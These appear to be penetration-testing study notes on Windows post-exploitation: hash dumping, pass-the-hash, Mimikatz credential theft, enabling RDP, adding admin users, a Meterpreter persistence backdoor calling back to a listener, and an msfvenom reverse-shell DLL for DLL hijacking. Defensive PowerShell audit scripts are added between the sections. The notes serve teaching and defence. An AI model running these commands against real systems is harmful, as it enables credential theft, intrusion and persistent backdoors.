Persistence

Maintain Access

  1. Password hash (Pass-the-Hash / Crack-the-Hash) --> Services

  2. Backdoor

  3. New users

Meterpreter - run hashdump

Dump hashes from SAM database:

run hashdump

Sometimes this fails. The usual workaround is to migrate Meterpreter into another process first, then run hashdump again.

Or we can use:

run post/windows/gather/smart_hashdump

Then, back in the Metasploit console, list what was collected:

creds
loot

Pass-the-Hash in Metasploit

We may use psexec:

use exploit/windows/smb/psexec

Notably, the NTLM hash itself can be supplied as SMBPass; the module does not need the cleartext password.

The account has to be an administrator for psexec to work.

Also, if the account is a member of the local Administrators group but is not the built-in Administrator, psexec may fail with STATUS_ACCESS_DENIED: UAC remote restrictions filter the token of local administrator accounts that log on over the network. The workaround in these notes is two registry changes:

  1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System > Add a new DWORD (32-bit) LocalAccountTokenFilterPolicy and set the value to 1

  2. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters > Add a new DWORD (32-bit) RequireSecuritySignature and set the value to 0

Or in PowerShell:

Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\LanManServer\Parameters -Name RequireSecuritySignature -Value 0 -Type DWord

Or with reg.exe:

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters" /v RequireSecuritySignature /t REG_DWORD /d 0 /f
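From the defender's side, both of those values are worth auditing: the first removes UAC remote restrictions for every local administrator account, and the second stops the SMB server from requiring signing. The following PowerShell is an added example, not part of the original notes; it only assumes the two key paths and value names shown above and reports whether a host is in the weakened state, with a second function to revert it.

```powershell
# Added example (not from the original notes): audit the two registry values the
# workaround above sets, and put them back. Key paths and value names are the
# ones shown above; nothing else is assumed.

function Get-RemoteAdminHardening {
    $checks = @(
        @{
            Name   = 'LocalAccountTokenFilterPolicy'
            Path   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
            # 1 turns off UAC remote restrictions; absent or 0 is the hardened default.
            IsWeak = { param($v) $v -eq 1 }
            Note   = 'Local Administrators members get a full (unfiltered) token over the network'
        },
        @{
            Name   = 'RequireSecuritySignature'
            Path   = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters'
            # 0 (or absent on a non-domain-controller) means the SMB server does not require signing.
            IsWeak = { param($v) ($null -eq $v) -or ($v -eq 0) }
            Note   = 'SMB server does not require signing'
        }
    )

    foreach ($c in $checks) {
        $item  = Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue
        $value = if ($null -ne $item) { $item.($c.Name) } else { $null }
        [pscustomobject]@{
            Value   = $c.Name
            Path    = $c.Path
            Current = if ($null -eq $value) { '<not set>' } else { $value }
            Weak    = [bool](& $c.IsWeak $value)
            Note    = $c.Note
        }
    }
}

function Set-RemoteAdminHardening {
    # Reverts both values to the hardened state. Needs an elevated shell.
    Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' `
        -Name LocalAccountTokenFilterPolicy -Value 0 -Type DWord
    Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters' `
        -Name RequireSecuritySignature -Value 1 -Type DWord
}

# Usage: report first; call Set-RemoteAdminHardening only after reviewing the output.
Get-RemoteAdminHardening | Format-Table -AutoSize
```

A LocalAccountTokenFilterPolicy of 1 on a workstation is a common sign that someone has prepared the box for remote administration with local accounts, and it is exactly the setting that makes pass-the-hash with a non-RID-500 local admin work. Requiring SMB signing again can break very old clients, so stage that change rather than pushing it fleet-wide blind.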

Pass-the-Hash via RDP

We may use xfreerdp in Kali Linux.

xfreerdp /u:<user> /d:<domain> /pth:<ntlm> /v:<target>

Mimikatz in Meterpreter

The best case is a 64-bit target. Migrate Meterpreter into a 64-bit process first; a good candidate is a 64-bit process running as SYSTEM, which the following filters for:

ps -A x86_64 -s
migrate <target_PID>

Then load Mimikatz:

load mimikatz

Retrieve credentials using wdigest:

wdigest

Enable RDP

To check whether the Remote Desktop service is running, list the started services:

net start

Or with WMIC:

wmic service where 'Caption like "Remote%" and started=true' get Caption

Or in Meterpreter:

run service_manager -l
run post/windows/gather/enum_services

Then enable it. In Meterpreter:

run getgui -e

The user also has to be allowed to log on over RDP, i.e. be in the Remote Desktop Users group (the "Allow log on through Remote Desktop Services" right in local policy). In cmd:

net localgroup "Remote Desktop Users" <user> /add
rem Or even ...
net localgroup "administrators" <user> /add

Then we can RDP using rdesktop:

rdesktop <ip_address> -u <user> -p <password>

A similar trick exists for the Telnet service: membership in the TelnetClients group is what grants a telnet shell.

Persistence in Meterpreter

Persistence module options:

-A:  Start handler locally
-X:  Start the agent at boot (needs SYSTEM)
-i:  Connection attempt interval
-p:  Listening port
-r:  Local IP address

# Example:
run persistence -A -X -i 5 -p 8080 -r 172.16.10.5

The steps the module performs to set up this persistence:

  1. Create the payload using msfvenom

  2. Upload the backdoor

  3. Execute the backdoor

  4. Add entry in Windows Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xxxx

    reg setval -k HKLM\\SOFTWARE\\microsoft\\windows\\currentversion\\run -d "<path_to_backdoor>" -v <backdoor_name>

  5. Use multi/handler to get shell
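Step 4 is the part that survives a reboot and the part a defender can enumerate. The script below is an added example, not part of the original notes: it walks the HKLM and HKCU Run/RunOnce keys, extracts the executable from each command line (quoted or unquoted, with environment variables expanded), and flags entries whose binary is missing, unsigned, or outside the standard install directories. The key list and the "trusted directory" heuristic are assumptions of the example.

```powershell
# Added example (not from the original notes): triage Run-key autostarts.
# The key list and the trusted-directory heuristic are choices of this example.

function Get-CommandExecutable {
    # Pull the executable path out of a Run-key command line: either the quoted
    # first token or the longest leading prefix that names an existing file
    # (unquoted paths such as C:\Program Files\... contain spaces).
    param([string]$CommandLine)
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) }
    }
    $parts = $cmd -split ' '
    for ($i = 1; $i -le $parts.Count; $i++) {
        $candidate = ($parts[0..($i - 1)] -join ' ')
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $parts[0]   # bare name relying on PATH lookup, or a file that is gone
}

function Get-RunKeyEntries {
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    # Get-ItemProperty adds these bookkeeping properties; they are not registry values.
    $metaProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    $trusted = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

    foreach ($k in $keys) {
        $props = Get-ItemProperty -Path $k -ErrorAction SilentlyContinue
        if ($null -eq $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            if ($metaProps -contains $p.Name) { continue }
            $exe    = Get-CommandExecutable ([string]$p.Value)
            $exists = Test-Path -LiteralPath $exe -PathType Leaf
            $inTrusted = $false
            foreach ($t in $trusted) {
                if ($exe.StartsWith($t + '\', [StringComparison]::OrdinalIgnoreCase)) { $inTrusted = $true }
            }
            $sig = if ($exists) { (Get-AuthenticodeSignature -FilePath $exe).Status.ToString() } else { 'n/a' }
            [pscustomobject]@{
                Key        = $k
                Name       = $p.Name
                Executable = $exe
                Exists     = $exists
                TrustedDir = $inTrusted
                Signature  = $sig
                # Missing, unsigned, or living outside the usual install dirs: look closer.
                Suspicious = (-not $exists) -or (-not $inTrusted) -or ($sig -ne 'Valid')
            }
        }
    }
}

Get-RunKeyEntries | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

Expect some benign hits (vendor updaters in %LOCALAPPDATA%, unsigned in-house tools); the point is that a freshly uploaded backdoor registered under Run will always land in the Suspicious rows, so the list is short enough to review by hand. Entries that resolve to a bare executable name also deserve attention, since they depend on PATH lookup.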

Add new users

Add a new admin:

net user <user> <pass> /add
net localgroup administrators <user> /add

DLL Hijacking / Preloading

This abuses the DLL search order. When a program launches, the search order (with the default SafeDllSearchMode) is:

  1. Directory of the executable

  2. C:\Windows\System32

  3. C:\windows\system

  4. C:\windows

  5. Current directory at the time of execution

  6. Directories in %PATH%

To look for DLL hijacking opportunities, use Process Monitor to inspect the DLLs each process tries to load:

  1. Create a procmon filter for the specific executable, plus a filter on the Result column for NAME NOT FOUND, so only the relevant load attempts are shown.

  2. Identify the DLL in a directory which we have write/modify permission.

  3. Drop the modified payload in the writable directory

  4. Restart the service or application so the DLL is loaded.

msfvenom can generate a DLL payload:

msfvenom -p windows/meterpreter/reverse_https LHOST=x.x.x.x LPORT=xxxx -f dll > payload.dll
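The whole technique depends on one of the directories in that search order being writable by someone who should not be able to write there. The script below is an added example, not part of the original notes: it takes the directory of an executable under review plus every entry in PATH, reads each directory's ACL, and reports which ones grant low-privilege principals a right that allows planting or replacing a file. The set of "low-privilege" principals and the rights mask are choices of this example.

```powershell
# Added example (not from the original notes): find search-order directories
# that standard users can write to. Principal list and rights mask are assumptions.

function Test-StandardUserWrite {
    # Returns the low-privilege principals granted a "can plant or replace a
    # file" right on the directory. Deny ACEs are ignored, which can only
    # over-report, never hide a writable directory.
    param([System.Security.AccessControl.DirectorySecurity]$Acl)
    $lowPriv = @('Everyone', 'BUILTIN\Users',
                 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
    # WriteData/CreateFiles (0x2), AppendData/CreateDirectories (0x4),
    # DeleteSubdirectoriesAndFiles (0x40), Delete (0x10000), plus the
    # GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) bits that
    # appear on inherited ACEs. Modify and FullControl contain these bits.
    $plantMask = 0x2 -bor 0x4 -bor 0x40 -bor 0x10000 -bor 0x40000000 -bor 0x10000000
    $hits = foreach ($ace in $Acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $plantMask) -ne 0) { $ace.IdentityReference.Value }
    }
    return @($hits | Select-Object -Unique)
}

function Get-DllPlantingDirectories {
    param(
        # Optional: the executable under review; its own directory is searched first.
        [string]$ExecutablePath
    )
    $dirs = [System.Collections.Generic.List[string]]::new()
    if ($ExecutablePath) { $dirs.Add((Split-Path -Parent $ExecutablePath)) }
    foreach ($d in ($env:Path -split ';')) { if ($d.Trim()) { $dirs.Add($d.Trim()) } }

    foreach ($d in ($dirs | Select-Object -Unique)) {
        if (-not (Test-Path -LiteralPath $d -PathType Container)) {
            # A PATH entry that does not exist is still searched; worth knowing about.
            [pscustomobject]@{ Directory = $d; Status = 'missing'; Principals = '' }
            continue
        }
        $who = Test-StandardUserWrite -Acl (Get-Acl -LiteralPath $d)
        [pscustomobject]@{
            Directory  = $d
            Status     = if ($who.Count -gt 0) { 'WRITABLE by standard users' } else { 'ok' }
            Principals = ($who -join ', ')
        }
    }
}

# Usage: pass the program you are reviewing, or omit it to audit PATH alone.
Get-DllPlantingDirectories -ExecutablePath "$env:SystemRoot\System32\notepad.exe" | Format-Table -AutoSize
```

Anything reported as WRITABLE that sits ahead of System32 in the order above, or that appears in a service's PATH, is the condition the procmon steps are hunting for; fixing the ACL (or removing the stray PATH entry) closes the opportunity for every binary that searches that directory, not just the one you were looking at.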
